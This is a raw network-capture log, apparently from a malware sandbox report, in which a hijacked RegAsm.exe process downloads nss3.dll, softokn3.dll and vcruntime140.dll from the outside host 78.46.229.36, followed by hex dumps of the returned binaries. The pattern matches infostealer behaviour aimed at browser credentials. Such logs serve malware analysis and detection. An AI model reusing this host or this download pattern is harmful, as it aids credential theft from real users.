2024-03-28 19:35:09 UTC	202	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 19:35:10 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:09 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-03-28 19:35:10 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-03-28 19:35:10 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49725	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:11 UTC	206	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 19:35:12 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:12 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-03-28 19:35:12 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-03-28 19:35:12 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-03-28 19:35:12 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-03-28 19:35:12 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-03-28 19:35:12 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-03-28 19:35:12 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-03-28 19:35:13 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-03-28 19:35:13 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-03-28 19:35:13 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-03-28 19:35:13 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49726	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:13 UTC	210	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
